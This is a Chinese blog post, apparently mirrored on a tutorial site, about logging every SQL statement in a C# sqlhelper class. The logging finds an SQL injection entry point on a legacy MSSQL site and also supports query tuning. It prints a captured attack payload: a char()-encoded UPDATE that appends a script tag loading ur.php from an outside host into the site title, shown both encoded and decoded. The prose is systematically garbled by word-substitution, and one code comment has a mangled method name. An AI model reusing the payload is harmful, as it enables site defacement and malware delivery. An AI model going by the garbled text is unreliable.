程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 數據庫知識 >> 其他數據庫知識 >> MSSQL >> 記一次勝利的sql注入入侵檢測附帶sql機能優化

記一次勝利的sql注入入侵檢測附帶sql機能優化

編輯:MSSQL

記一次勝利的sql注入入侵檢測附帶sql機能優化。本站提示廣大學習愛好者:(記一次勝利的sql注入入侵檢測附帶sql機能優化)文章只能為提供參考,不一定能成為您想要的結果。以下是記一次勝利的sql注入入侵檢測附帶sql機能優化正文


然則假如是讓你接辦一個二等殘廢的網站,並讓你在下面改版,並且不克不及顛覆式改版,只能慢慢調換舊的法式,那末你會異常苦楚,例如我碰到的成績:
成績1.
老板對你說,之前剛做完網站好好了,沒有湧現木馬,怎樣你來了,就會湧現木馬,先別說了,趕忙處理成績,我完全無語,然則假如爭持,其實證實你和老板一樣蒙昧,拿出證據和現實剖析來讓公司其他略微懂技巧的一路來證實,公司網站被掛馬不是你來了的錯。
如是我經由過程網站目次細心排查將經由過程fck上傳的網馬刪除並修補fck的上傳破綻並記下了這篇 Fckeditor應用筆記 ,其實許多人都碰到過,也處理過,都是小成績,然則讓你老板明確比處理破綻成績更蛋疼,我那說明的叫一個汗啊,巴不得把公司一切略微懂點技巧的都叫上讓他們看甚麼是年夜馬甚麼是小馬,然後演示怎樣上傳木馬,奶奶的,黑客教程普及啊。
成績2.
網站又湧現成績,前次的成績處理了不外兩個月,網站又被入侵掛馬,如是老板此次再說由於我來了才出成績,立馬走人,這就是為何不克不及更不懂技巧的人硬碰硬,更不克不及和你的老板來講,說了你又不懂。
然則要命的是網站是之前的技巧開辟的二等殘廢,在別個的cms上修正的,我必需包管網站在的開辟的同時舊的模塊還可使用,經由過程慢慢更新的辦法將網站底層創新,然則那末多頁面,你很難一個一個去檢測誰人頁面有破綻,如是寫出上面的檢測代碼,沒想到這麼簡略的就弄定了,而且可以經由過程此辦法優化你的sql。
第一步樹立一個sql日記表

CREATE TABLE [dbo].[my_sqllog](
[id] [bigint] IDENTITY(1,1) NOT NULL,
[hit] [bigint] NULL,
[sqltext] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[paramdetails] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[begintime] [datetime] NULL,
[endtime] [datetime] NULL,
[fromurl] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[ip] [varchar](20) COLLATE Chinese_PRC_CI_AS NULL,
[lastelapsedtime] [bigint] NULL,
CONSTRAINT [PK_my_sqllog] PRIMARY KEY CLUSTERED
(
[id] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]

記載sql語句、此sql語句被履行次數,參數及值,記載開端時光,停止時光,來自哪一個頁面,ip和此條語句履行時光(臨時沒用)
第二步在sqlhelper裡寫記載代碼
兩個辦法原來可以寫成private的,然則此二等殘廢的網站其他處所用的其余sqlhelper類,就直接挪用此處經由過程公道優化的sqlhelper類的辦法了。
代碼1:拔出日記

public static int ExecuteSqlLog(CommandType commandType, string commandText, params DbParameter[] cmdParams)
{
#region 參數處置
string colums = "";
string dbtypes = "";
string values = "";
string paramdetails = "";
if (cmdParams != null && cmdParams.Length > 0)
{
foreach (DbParameter param in cmdParams)
{
if (param == null)
{
continue;
}
colums += param.ParameterName + " ";
dbtypes += param.DbType + " ";
values += param.Value + ";";
}
paramdetails = string.Format(" {0},{1},{2}", colums, dbtypes, values);
}
string fromurl = "";
if (System.Web.HttpContext.Current!=null)
{
fromurl = System.Web.HttpContext.Current.Request.Url.ToString();
}
// commandText = commandText.WordStr("'","‘").WordStr(";",";");
SqlParameter[] parameters = new SqlParameter[]
{
new SqlParameter("@hit",1),
new SqlParameter("@sqltext",commandText),
new SqlParameter("@paramdetails",paramdetails),
new SqlParameter("@begintime",DateTime.Now),
new SqlParameter("@endtime",DateTime.Now),
new SqlParameter("@fromurl",fromurl),
new SqlParameter("@ip",Web.PressRequest.GetIP()),
new SqlParameter("@lastelapsedtime",0),
};
#endregion
using (DbConnection connection = Factory.CreateConnection())
{
connection.ConnectionString = GetRealConnectionString(commandText);//ConnectionString;
string sql = "";
// 履行DbCommand敕令,並前往成果.
int id =
Utils.TypeConverter.ObjectToInt(ExecuteScalarLog(CommandType.Text,
"select top 1 id from my_sqllog where sqltext=@sqltext",
new SqlParameter("@sqltext", commandText)));
if (id > 0)
{
sql = "update my_sqllog set hit=hit+1,ip=@ip,endtime=@endtime,fromurl=@fromurl where id=" + id;
}
else
{
sql = "insert into my_sqllog(hit,sqltext,paramdetails,begintime,endtime,fromurl,ip,lastelapsedtime) values(@hit,@sqltext,@paramdetails,@begintime,@endtime,@fromurl,@ip,@lastelapsedtime)";
}
// 創立DbCommand敕令,並停止預處置
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, sql, parameters, out mustCloseConnection);
// 履行DbCommand敕令,並前往成果.
int retval = cmd.ExecuteNonQuery();
// 消除參數,以便再次應用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

代碼2:斷定此條sql能否存在

private static object ExecuteScalarLog( CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (ConnectionString == null || ConnectionString.Length == 0) throw new ArgumentNullException("ConnectionString");
// 創立並翻開數據庫銜接對象,操作完成釋放對象.
using (DbConnection connection = Factory.CreateConnection())
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創立DbCommand敕令,並停止預處置
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
// 履行DbCommand敕令,並前往成果.
object retval = cmd.ExecuteScalar();
// 消除參數,以便再次應用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

第三部在你的每一個履行sql語句的辦法裡參加以下代碼,不論是ExecuteScalar、ExecuteReader照樣ExecuteNonQuery等等都加上

//履行sql之進步行日記記載把持
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);

代碼示例:

public static object ExecuteScalar(DbConnection connection, CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 創立DbCommand敕令,並停止預處置
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
//履行sql之進步行日記記載把持
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);
// 履行DbCommand敕令,並前往成果.
object retval = cmd.ExecuteScalar();
// 消除參數,以便再次應用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}

然後你會發明入侵的進口被記載上去了,前面方框裡的就是結構注入的sql

結構sql以下:

39191+update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar(8000)),cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(100)+char(102)+char(114)+char(103)+char(99)+char(99)+char(46)+char(99)+char(111)+char(109)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
轉碼後釀成如許了:  

update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar(8000)),websitetitle+'</title><script src=http://jb51.net/ur.php></script>')
這個就是木馬地址,沒事你就別點了,獵奇害逝世貓。

小結:
既然曉得進口就曉得怎樣解救了吧,把string類型該過濾的都過濾失落,int類型的就得是int類型,別讓數據庫替你隱式轉。經由過程此sql日記記載,你應當發明一點誰人hit照樣有點價值的。
經由過程select top 100 * from my_sqllog order by hit desc
你會發明你寫的那末多sql本來真渣滓,在前提許可的情形下干嗎不把它放到緩存裡。所今後來我寫的sql根本不在這top 100裡。
拋磚引玉,望高手批駁,以上入侵辦法願望剛進修做法式員的同窗不要用來欺侮小網站,傷不起。
作者:jqbird

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved